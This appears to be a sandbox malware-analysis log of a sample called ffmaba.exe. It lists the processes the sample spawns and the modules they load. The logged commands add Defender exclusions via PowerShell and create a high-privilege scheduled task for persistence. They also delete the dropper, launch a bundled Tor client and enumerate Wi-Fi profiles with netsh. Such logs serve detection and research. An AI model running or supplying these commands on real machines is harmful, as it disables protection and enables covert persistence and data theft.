                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 3
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /R /C:"[ ]:[ ]"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "SSID BSSID Signal"
                Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /C:"[ ]:[ ]"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "SSID BSSID Signal"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: httpapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libevent-2-1-7.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libssp-0.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libssp-0.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libgcc_s_sjlj-1.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libwinpthread-1.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libwinpthread-1.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libcrypto-1_1.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libssl-1_1.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: zlib1.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
